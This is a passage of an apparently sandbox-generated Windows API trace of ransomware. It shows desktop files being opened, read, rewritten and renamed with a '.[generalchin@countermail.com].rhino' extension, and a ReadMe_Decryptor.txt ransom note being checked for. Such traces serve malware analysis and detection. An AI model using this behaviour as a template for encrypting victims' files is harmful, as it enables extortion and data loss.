lpNumberOfBytesRead=0x4af2ac*=0x20, lpOverlapped=0x0) returned 1 [0080.394] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.395] ReadFile (in: hFile=0x124, lpBuffer=0x3110040, nNumberOfBytesToRead=0x163b9, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x3110040*, lpNumberOfBytesRead=0x4af2ac*=0x163b9, lpOverlapped=0x0) returned 1 [0080.396] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5760 [0080.396] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0080.396] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x715080 [0080.396] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e6b00 [0080.396] GetLastError () returned 0x0 [0080.396] SetLastError (dwErrCode=0x0) [0080.396] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0080.396] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x163dc) returned 0x744cd8 [0080.397] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0080.397] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x703e78 [0080.397] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x703f80 [0080.397] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0080.397] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.397] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x6f5760 [0080.397] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x6f5750 [0080.397] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0080.397] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x6f5760 [0080.397] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0080.397] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5750 [0080.397] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0080.397] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x6f5760 [0080.397] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0080.398] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x714170 [0080.398] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0080.398] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x714188 [0080.398] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714170 | out: hHeap=0x6d0000) returned 1 [0080.398] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709f08 [0080.398] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714188 | out: hHeap=0x6d0000) returned 1 [0080.398] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x713d48 [0080.398] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709f08 | out: hHeap=0x6d0000) returned 1 [0080.398] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x715080 [0080.398] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713d48 | out: hHeap=0x6d0000) returned 1 [0080.398] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e6b00 [0080.398] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0080.398] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6f36d0 [0080.398] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0080.398] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x703e78 [0080.398] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0080.398] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x721c20 [0080.398] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0080.398] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x721d00 [0080.398] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0080.398] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x714b90 [0080.399] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721d00 | out: hHeap=0x6d0000) returned 1 [0080.399] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x721c20 [0080.399] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714b90 | out: hHeap=0x6d0000) returned 1 [0080.399] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x75b0d8 [0080.455] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0080.455] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x6f45b8 [0080.455] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75b0d8 | out: hHeap=0x6d0000) returned 1 [0080.455] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x6ee498 [0080.455] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f45b8 | out: hHeap=0x6d0000) returned 1 [0080.455] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x6eee00 [0080.455] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ee498 | out: hHeap=0x6d0000) returned 1 [0080.456] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x6efc18 [0080.456] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eee00 | out: hHeap=0x6d0000) returned 1 [0080.456] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x715898 [0080.456] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6efc18 | out: hHeap=0x6d0000) returned 1 [0080.456] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x6ee498 [0080.456] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715898 | out: hHeap=0x6d0000) returned 1 [0080.458] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x715898 [0080.459] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ee498 | out: hHeap=0x6d0000) returned 1 [0080.459] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x7630c0 [0080.461] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715898 | out: hHeap=0x6d0000) returned 1 [0080.461] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x769ba0 [0080.462] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7630c0 | out: hHeap=0x6d0000) returned 1 [0080.462] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf02a) returned 0x773bd0 [0080.464] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x769ba0 | out: hHeap=0x6d0000) returned 1 [0080.464] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1682d) returned 0x782c08 [0080.466] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x773bd0 | out: hHeap=0x6d0000) returned 1 [0080.466] WriteFile (in: hFile=0x124, lpBuffer=0x782c20*, nNumberOfBytesToWrite=0x164d9, lpNumberOfBytesWritten=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x782c20*, lpNumberOfBytesWritten=0x4af2ac*=0x164d9, lpOverlapped=0x0) returned 1 [0080.482] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x782c08 | out: hHeap=0x6d0000) returned 1 [0080.482] UnlockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x164d9, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0080.483] CloseHandle (hObject=0x124) returned 1 [0080.484] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x6fabf0 [0080.484] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9730 [0080.485] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6fabf0 | out: hHeap=0x6d0000) returned 1 [0080.485] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iE jK0f.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ie jk0f.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iE jK0f.pptx.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ie jk0f.pptx.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0080.486] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9730 | out: hHeap=0x6d0000) returned 1 [0080.486] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703f80 | out: hHeap=0x6d0000) returned 1 [0080.486] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x744cd8 | out: hHeap=0x6d0000) returned 1 [0080.486] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f6970 [0080.486] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eba00 | out: hHeap=0x6d0000) returned 1 [0080.486] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f69c8 [0080.486] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eba00 [0080.486] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f69c8 | out: hHeap=0x6d0000) returned 1 [0080.486] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0080.486] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eba00 | out: hHeap=0x6d0000) returned 1 [0080.486] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Msox.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\msox.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0080.486] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x4af30c | out: lpFileSizeHigh=0x4af30c*=0x0) returned 0x8034 [0080.487] LockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x8154, nNumberOfBytesToLockHigh=0x0) returned 1 [0080.487] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.487] ReadFile (in: hFile=0x124, lpBuffer=0x4af2cc, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x4af2cc*, lpNumberOfBytesRead=0x4af2ac*=0x20, lpOverlapped=0x0) returned 1 [0080.488] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.489] ReadFile (in: hFile=0x124, lpBuffer=0x3110040, nNumberOfBytesToRead=0x8034, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x3110040*, lpNumberOfBytesRead=0x4af2ac*=0x8034, lpOverlapped=0x0) returned 1 [0080.489] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5760 [0080.489] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0080.490] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x715080 [0080.490] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e6b00 [0080.490] GetLastError () returned 0x0 [0080.490] SetLastError (dwErrCode=0x0) [0080.490] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0080.490] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8057) returned 0x744cd8 [0080.490] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0080.490] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x703e78 [0080.490] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x703f80 [0080.490] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0080.490] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.490] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x6f5760 [0080.490] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x6f5750 [0080.490] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0080.490] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x6f5760 [0080.491] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0080.491] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5750 [0080.491] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0080.491] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x6f5760 [0080.491] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0080.491] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x714188 [0080.491] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0080.491] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x714170 [0080.491] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714188 | out: hHeap=0x6d0000) returned 1 [0080.491] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709f08 [0080.491] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714170 | out: hHeap=0x6d0000) returned 1 [0080.491] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x713d48 [0080.491] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709f08 | out: hHeap=0x6d0000) returned 1 [0080.491] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x715080 [0080.491] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713d48 | out: hHeap=0x6d0000) returned 1 [0080.491] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e6b00 [0080.491] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0080.492] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6f36d0 [0080.492] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0080.492] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x703e78 [0080.492] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0080.492] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x721c20 [0080.492] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0080.492] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x721d00 [0080.492] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0080.492] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x714b90 [0080.492] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721d00 | out: hHeap=0x6d0000) returned 1 [0080.492] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x721c20 [0080.492] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714b90 | out: hHeap=0x6d0000) returned 1 [0080.492] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x75b0d8 [0080.492] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0080.492] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x6f45b8 [0080.492] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75b0d8 | out: hHeap=0x6d0000) returned 1 [0080.492] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x6ee498 [0080.493] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f45b8 | out: hHeap=0x6d0000) returned 1 [0080.493] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x6eee00 [0080.493] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ee498 | out: hHeap=0x6d0000) returned 1 [0080.493] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x6efc18 [0080.493] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eee00 | out: hHeap=0x6d0000) returned 1 [0080.493] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x715898 [0080.493] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6efc18 | out: hHeap=0x6d0000) returned 1 [0080.493] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x6ee498 [0080.493] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715898 | out: hHeap=0x6d0000) returned 1 [0080.497] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x715898 [0080.498] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ee498 | out: hHeap=0x6d0000) returned 1 [0080.498] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x74cd38 [0080.701] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715898 | out: hHeap=0x6d0000) returned 1 [0080.702] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x7630c0 [0080.705] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x74cd38 | out: hHeap=0x6d0000) returned 1 [0080.705] WriteFile (in: hFile=0x124, lpBuffer=0x7630e0*, nNumberOfBytesToWrite=0x8154, lpNumberOfBytesWritten=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x7630e0*, lpNumberOfBytesWritten=0x4af2ac*=0x8154, lpOverlapped=0x0) returned 1 [0080.706] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7630c0 | out: hHeap=0x6d0000) returned 1 [0080.706] UnlockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x8154, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0080.706] CloseHandle (hObject=0x124) returned 1 [0080.707] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x6f36d0 [0080.707] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9730 [0080.707] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0080.707] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Msox.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\msox.ots"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Msox.ots.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\msox.ots.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0080.709] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9730 | out: hHeap=0x6d0000) returned 1 [0080.709] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703f80 | out: hHeap=0x6d0000) returned 1 [0080.709] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x744cd8 | out: hHeap=0x6d0000) returned 1 [0080.709] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f69c8 [0080.709] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f6970 | out: hHeap=0x6d0000) returned 1 [0080.709] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f6970 [0080.709] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eba00 [0080.709] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f6970 | out: hHeap=0x6d0000) returned 1 [0080.709] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0080.709] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eba00 | out: hHeap=0x6d0000) returned 1 [0080.709] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mWLyWGy_QWFT.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mwlywgy_qwft.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0080.709] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x4af30c | out: lpFileSizeHigh=0x4af30c*=0x0) returned 0x9652 [0080.710] LockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x9772, nNumberOfBytesToLockHigh=0x0) returned 1 [0080.710] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.710] ReadFile (in: hFile=0x124, lpBuffer=0x4af2cc, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x4af2cc*, lpNumberOfBytesRead=0x4af2ac*=0x20, lpOverlapped=0x0) returned 1 [0080.712] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.712] ReadFile (in: hFile=0x124, lpBuffer=0x3110040, nNumberOfBytesToRead=0x9652, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x3110040*, lpNumberOfBytesRead=0x4af2ac*=0x9652, lpOverlapped=0x0) returned 1 [0080.713] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5760 [0080.713] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0080.713] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x715080 [0080.713] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e6b00 [0080.713] GetLastError () returned 0x0 [0080.713] SetLastError (dwErrCode=0x0) [0080.713] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0080.713] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9675) returned 0x744cd8 [0080.713] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0080.714] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x703e78 [0080.714] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x703f80 [0080.714] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0080.714] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.714] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x6f5760 [0080.714] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x6f5750 [0080.714] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0080.714] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x6f5760 [0080.714] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0080.714] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5750 [0080.714] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0080.714] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x6f5760 [0080.714] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0080.714] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x714170 [0080.714] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0080.714] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x714188 [0080.714] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714170 | out: hHeap=0x6d0000) returned 1 [0080.714] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 